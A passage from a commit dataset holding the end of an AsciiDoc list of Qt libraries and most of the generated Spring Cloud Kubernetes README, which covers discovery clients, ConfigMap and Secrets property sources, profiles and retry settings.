class\nhierarchy.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use majority of Node.js libraries.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. 
You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired in Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports HTTP and WebSocket protocol. Web applications can run faster than that\nof lightweight programming language. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. 
The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts, or user activity\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up to date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt-application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but still an application built with Qt can leverage it well enough because\nit is cross platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"01879d4c47dea9025fb03eea6a29d960165e5885","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. 
IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well-known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes, you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set. Starters that begin with `spring-cloud-starter-kubernetes-fabric8`\nprovide implementations using the https:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java Client].\nStarters that begin with\n`spring-cloud-starter-kubernetes-client` provide implementations using the https:\/\/github.com\/kubernetes-client\/java[Kubernetes Java Client].\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-config<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-all<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n 
<artifactId>spring-cloud-starter-kubernetes-client-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\nHTTP Based `DiscoveryClient`\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-discoveryclient<\/artifactId>\n<\/dependency>\n----\n====\n\nNOTE: `spring-cloud-starter-kubernetes-discoveryclient` is designed to be used with the\n<<spring-cloud-kubernetes-discoveryserver, Spring Cloud Kubernetes DiscoveryServer>>.\n\n====\nFabric8 Kubernetes Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the desired configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nTo discover service endpoint addresses that are not marked as \"ready\" by the Kubernetes API server, you can set the following property in `application.properties` (default: false):\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.include-not-ready-addresses=true\n----\nNOTE: This might be useful when discovering services for monitoring purposes, and would enable inspecting the `\/health` endpoint of not-ready service instances.\n====\n\nIf your service exposes multiple ports, you will need to specify which port the `DiscoveryClient` should use.\nThe `DiscoveryClient` will choose the port using the following logic.\n\n1. If the service has a label `primary-port-name`, it will use the port with the name specified in the label's value.\n2. If no label is present, then the port name specified in `spring.cloud.kubernetes.discovery.primary-port-name` will be used.\n3. If neither of the above is specified, it will use the port named `https`.\n4. 
You can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nTo discover service endpoint addresses that are not marked as \"ready\" by the Kubernetes API server, you can set the following property in `application.properties` (default: false):\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.include-not-ready-addresses=true\n----\nNOTE: This might be useful when discovering services for monitoring purposes, and would enable inspecting the `\/health` endpoint of not-ready service instances.\n====\n\nIf your service exposes multiple ports, you will need to specify which port the `DiscoveryClient` should use.\nThe `DiscoveryClient` chooses the port by using the following logic:\n\n1. If the service has a label `primary-port-name`, it uses the port with the name specified in the label's value.\n2. If no label is present, then the port name specified in `spring.cloud.kubernetes.discovery.primary-port-name` is used.\n3. If neither of the above is specified, the port named `https` is used.\n4. If none of the above conditions are met, the port named `http` is used.\n5. As a last resort, the first port in the list of ports is picked.\n\nWARNING: The last option may result in non-deterministic behaviour.\nPlease make sure to configure your service and\/or application accordingly.\n\nBy default, all of the ports and their names are added to the metadata of the `ServiceInstance`.\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect on the name under which the application is registered within Kubernetes.\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality, you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server-side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native Kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaking, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a Spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the Spring Boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod = \"...\")`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` file (or a profile-specific variant, such as `application-profile.properties` or `application-profile.yaml`) that contains key-value pairs that provide customization values to your application or Spring Boot starters. You can override these properties by specifying system properties or environment variables.
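\n\nAs a brief illustration, a property from such a file can be overridden at launch time without rebuilding the application (the property name `greeting.message` and the jar name are illustrative assumptions):\n\n====\n[source,bash]\n----\n# override via a JVM system property\njava -Dgreeting.message=\"Hello from the command line\" -jar demo.jar\n\n# or via an environment variable, relying on Spring Boot's relaxed binding\nGREETING_MESSAGE=\"Hello from the environment\" java -jar demo.jar\n----\n====\n\n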
[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or the Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs in.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis feature facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.max`\n\nThis can be externalized to a config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: \"1\"\n pool.size.max: \"16\"\n----\n====
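\n\nThe `demo` application could bind these keys with a `@ConfigurationProperties` class along the following lines. This is a minimal sketch; the class and field names are illustrative assumptions:\n\n====\n[source,java]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"pool.size\")\npublic class PoolProperties {\n\n    \/\/ bound from pool.size.core\n    private int core;\n\n    \/\/ bound from pool.size.max\n    private int max;\n\n    public int getCore() { return core; }\n\n    public void setCore(int core) { this.core = core; }\n\n    public int getMax() { return max; }\n\n    public void setMax(int max) { this.max = max; }\n}\n----\n====\n\n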
Individual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n max: 16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n max: 16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile, and Spring Boot will automatically fetch it based\non the active profiles:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass the `SPRING_PROFILES_ACTIVE` environment variable.\nTo do so, define it in the PodSpec of the container specification in your Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nYou could run 
into a situation where there are multiple config maps that have the same property names. For example:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-one\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from one\n----\n====\n\nand\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-two\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from two\n----\n====\n\nDepending on the order in which you place these in `bootstrap.yaml|properties`, you might end up with an unexpected result (the last config map wins). For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-two\n - name: config-map-one\n----\n====\n\nwill result in property `greeting.message` being `Say Hello from one`.\n\nThere is a way to change this default configuration by specifying `useNameAsPrefix`. For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n----\n====\n\nSuch a configuration will result in two properties being generated:\n\n - `greeting.message` equal to `Say Hello from one`.\n\n - `config-map-two.greeting.message` equal to `Say Hello from two`.\n\nNotice that `spring.cloud.kubernetes.config.useNameAsPrefix` has a _lower_ priority than `spring.cloud.kubernetes.config.sources.useNameAsPrefix`.\nThis allows you to set a \"default\" strategy for all sources, while overriding it for only a few.\n\nIf using the config map name is not an option, you can specify a different strategy, called `explicitPrefix`. Since this is an _explicit_ prefix that\nyou select, it can only be supplied at the `sources` level. At the same time, it has a higher priority than `useNameAsPrefix`. Let's suppose we have a third config map with these entries:\n\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-three\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from three\n----\n====\n\nA configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n explicitPrefix: two\n - name: config-map-three\n----\n====\n\nwill result in three properties being generated:\n\n - `greeting.message` equal to `Say Hello from one`.\n\n - `two.greeting.message` equal to `Say Hello from two`.\n\n - `config-map-three.greeting.message` equal to `Say Hello from three`.\n\nBy default, besides reading the config map that is specified in the `sources` configuration, Spring will also try to read\nall properties from \"profile aware\" sources. The easiest way to explain this is via an example. Let's suppose your application\nenables a profile called \"dev\" and you have a configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-one\n----\n====\n\nBesides reading `config-map-one`, Spring will also try to read `config-map-one-dev`, in this particular order. Each active profile\ngenerates such a profile-aware config map.
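\n\nFor instance, if the active profiles were `dev` and `prod` (an illustrative assumption), the following config maps would be looked up, in this order:\n\n====\n[source]\n----\nconfig-map-one\nconfig-map-one-dev\nconfig-map-one-prod\n----\n====\n\n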
Though your application should not be impacted by such a config map, it can be disabled if needed:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n includeProfileSpecificSources: false\n namespace: default-namespace\n sources:\n - name: config-map-one\n includeProfileSpecificSources: false\n----\n====\n\nNotice that, just like before, there are two levels where you can specify this property: for all config maps or\nfor individual ones; the latter has a higher priority.\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod, you need to have the correct\nKubernetes service accounts, roles, and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod running the Spring Cloud Kubernetes application\nand have Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path`, the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n[#config-map-fail-fast]\nIn some cases, your application may be unable to load some of your `ConfigMaps` using the Kubernetes API.\nIf you want your application to fail the start-up process in such cases, you can set\n`spring.cloud.kubernetes.config.fail-fast=true` to make the application start-up fail with an Exception.\n\n[#config-map-retry]\nYou can also make your application retry loading `ConfigMap` property sources on a failure. First, you need to\nset `spring.cloud.kubernetes.config.fail-fast=true`. Then you need to add `spring-retry`\nand `spring-boot-starter-aop` to your classpath. You can configure retry properties such as\nthe maximum number of attempts and backoff options (such as the initial interval, multiplier, and maximum interval) by setting the\n`spring.cloud.kubernetes.config.retry.*` properties.
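\n\nFor example, a `bootstrap.properties` that enables fail-fast together with a customized retry policy might look as follows (the values are illustrative assumptions; the available property names are listed in the table below):\n\n====\n[source,properties]\n----\nspring.cloud.kubernetes.config.fail-fast=true\nspring.cloud.kubernetes.config.retry.max-attempts=10\nspring.cloud.kubernetes.config.retry.initial-interval=2000\nspring.cloud.kubernetes.config.retry.multiplier=1.5\nspring.cloud.kubernetes.config.retry.max-interval=10000\n----\n====\n\n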
NOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled, you can disable retry for `ConfigMap` `PropertySources`\nby setting `spring.cloud.kubernetes.config.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace to look up in\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n| `spring.cloud.kubernetes.config.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurs while loading a `ConfigMap`\n| `spring.cloud.kubernetes.config.retry.enabled` | `Boolean` | `true` | Enable or disable config retry.\n| `spring.cloud.kubernetes.config.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.config.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.config.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.config.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable this feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up `Secrets` in Kubernetes from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The `list` permission on secrets allows clients to inspect secret values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API, refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a Spring Boot application named `demo` that uses properties to read its database\nconfiguration. 
